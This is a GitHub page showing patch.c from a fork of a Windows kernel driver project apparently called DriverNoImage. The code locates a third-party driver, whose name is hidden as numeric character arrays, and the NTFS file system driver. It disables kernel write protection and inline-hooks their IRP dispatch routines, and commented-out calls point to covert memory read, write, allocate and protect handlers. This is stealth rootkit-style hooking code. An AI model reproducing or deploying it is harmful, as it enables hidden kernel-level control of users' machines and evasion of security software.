forked from baiyfcu/DriverNoImage
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpatch.c
199 lines (149 loc) · 4.75 KB
/
patch.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
#include <ntdef.h>
#include <ntifs.h>
#include "inlineHook.h"
#include "patchFun.h"
#include "replaceData.h"
extern NTSTATUS FASTCALL _myIrpDispath(IN PDEVICE_OBJECT DeviceObject, IN OUT PIRP Irp);
NTKERNELAPI NTSTATUS ObReferenceObjectByName(
IN PUNICODE_STRING ObjectName,
IN ULONG Attributes,
IN PACCESS_STATE PassedAccessState OPTIONAL,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN POBJECT_TYPE ObjectType,
IN KPROCESSOR_MODE AccessMode,
IN OUT PVOID ParseContext OPTIONAL,
OUT PVOID *Object
);
extern POBJECT_TYPE* IoDriverObjectType;
//////////////////////////////////////////////////////////////////////////
void* g_luOldAddr = NULL;
void* g_originalAddr = NULL;
ULONG g_patchSize = NULL;
PVOID g_myIrpAddrNew;
void HookLuDashi()
{
NTSTATUS result;
UNICODE_STRING DestinationString;
//\Driver\driverMain
//加了最后一位随机 a-z
wchar_t linkPath[] = { 92,68,114,105,118,101,114,92,100,117,109,112,95,100,117,109,112,108,100,115,0,0 };
PDRIVER_OBJECT pDriver = NULL;
for (int i = 0; i < 26; i++)
{
linkPath[20] = 97 + i;
RtlInitUnicodeString(&DestinationString, linkPath/*L"\\Driver\\ComputerZ"*/);
result = ObReferenceObjectByName(&DestinationString,
OBJ_CASE_INSENSITIVE, NULL, NULL,
*IoDriverObjectType, KernelMode, NULL, (PVOID)&pDriver);
if (NT_SUCCESS(result))
break;
pDriver = NULL;
}
//"pDriver:%p result:%lx IoDeviceObjectType:%p\n"
char printStr[] = { 112,68,114,105,118,101,114,58,37,112,32,114,101,115,117,108,116,58,37,108,120,32,73,111,68,101,118,105,99,101,79,98,106,101,99,116,84,121,112,101,58,37,112,92,110,0 };
DbgPrint(printStr, pDriver, result, IoDriverObjectType);
if (NT_SUCCESS(result))
{
KIRQL oldIrql;
g_luOldAddr = pDriver->MajorFunction[IRP_MJ_DEVICE_CONTROL];
KIRQL irql = WPOFFx64();
__int32 hookFlag = *(__int32*)g_luOldAddr;
WPONx64(irql);
if (hookFlag != 0x25FF)
{
InitFunTable();
//HOOK开始
g_myIrpAddrNew = CopyMyFun(_myIrpDispath, NULL);
HookKernelApi(g_luOldAddr, g_myIrpAddrNew, &g_originalAddr, &g_patchSize);
}
else
{
//"Driver had run...\n"
char printStr[] = { 68,114,105,118,101,114,32,104,97,100,32,114,117,110,46,46,46,92,110,0 };
DbgPrint(printStr);
}
ObfDereferenceObject(pDriver);
}
/*
PDEVICE_OBJECT DeviceObject = NULL;
PIRP Irp = NULL;
myIrpDispath(DeviceObject, Irp);
DoMemBase(NULL);
DoMemRead(NULL);
DoMemWrite(NULL);
DoMemAlloc(NULL);
DoMemProtect(NULL);
EncryptDecryptBuf(NULL, NULL, NULL);*/
}
void UnHookLuDashi()
{
if (g_originalAddr)
{
UnhookKernelApi(g_luOldAddr, g_originalAddr, g_patchSize);
ExFreePoolWithTag(g_myIrpAddrNew, 0);
}
}
NTSTATUS FASTCALL myIrpDispathTest(IN PDEVICE_OBJECT DeviceObject, IN OUT PIRP Irp)
{
//DbgPrint("myIrpDispath ENTRY!");
NTSTATUS NtStatus = STATUS_SUCCESS;
PIO_STACK_LOCATION pIoStackIrp = NULL;
pIoStackIrp = /*((IoGetCurrentIrpStackLocation_)FLAG_IoGetCurrentIrpStackLocation)*/Irp->Tail.Overlay.CurrentStackLocation;
if (pIoStackIrp && pIoStackIrp->MajorFunction == IRP_MJ_CREATE)
{
ULONG loControlCodes = pIoStackIrp->Parameters.DeviceIoControl.IoControlCode;//I/O控制代码
DbgPrint("myIrpDispath ENTRY!");
if (loControlCodes == -1)
{
Irp->IoStatus.Information = 0;
Irp->IoStatus.Status = STATUS_SUCCESS;
MyStruct* myData = (MyStruct*)FLAG_MYSTRUCT;
IofCompleteRequest(Irp, IO_NO_INCREMENT);
return NtStatus;
}
}
/*
((IofCompleteRequest_)FLAG_IofCompleteRequest)(Irp, IO_NO_INCREMENT);
return NtStatus;*/
PDRIVER_DISPATCH oldEnter = (ULONG64)g_luOldAddr + 0xF;
NTSTATUS status = oldEnter(DeviceObject, Irp);
return status;
}
void HookNTFS()
{
NTSTATUS result;
UNICODE_STRING DestinationString;
PDRIVER_OBJECT pDriver = NULL;
RtlInitUnicodeString(&DestinationString, L"\\FileSystem\\Ntfs");
result = ObReferenceObjectByName(&DestinationString,
OBJ_CASE_INSENSITIVE, NULL, NULL,
*IoDriverObjectType, KernelMode, NULL, (PVOID)&pDriver);
DbgPrint("pDriver:%p result:%lx IoDeviceObjectType:%p\n", pDriver, result, IoDriverObjectType);
if (NT_SUCCESS(result))
{
KIRQL oldIrql;
g_luOldAddr = pDriver->MajorFunction[IRP_MJ_CREATE];
KIRQL irql = WPOFFx64();
__int32 hookFlag = *(__int32*)g_luOldAddr;
WPONx64(irql);
if (hookFlag != 0x25FF)
{
//HOOK开始
HookKernelApi(g_luOldAddr, myIrpDispathTest, &g_originalAddr, &g_patchSize);
}
else
{
//"Driver had run...\n"
char printStr[] = { 68,114,105,118,101,114,32,104,97,100,32,114,117,110,46,46,46,92,110,0 };
DbgPrint(printStr);
}
ObfDereferenceObject(pDriver);
}
}
void UnHookNTFS()
{
if (g_originalAddr)
{
UnhookKernelApi(g_luOldAddr, g_originalAddr, g_patchSize);
}
}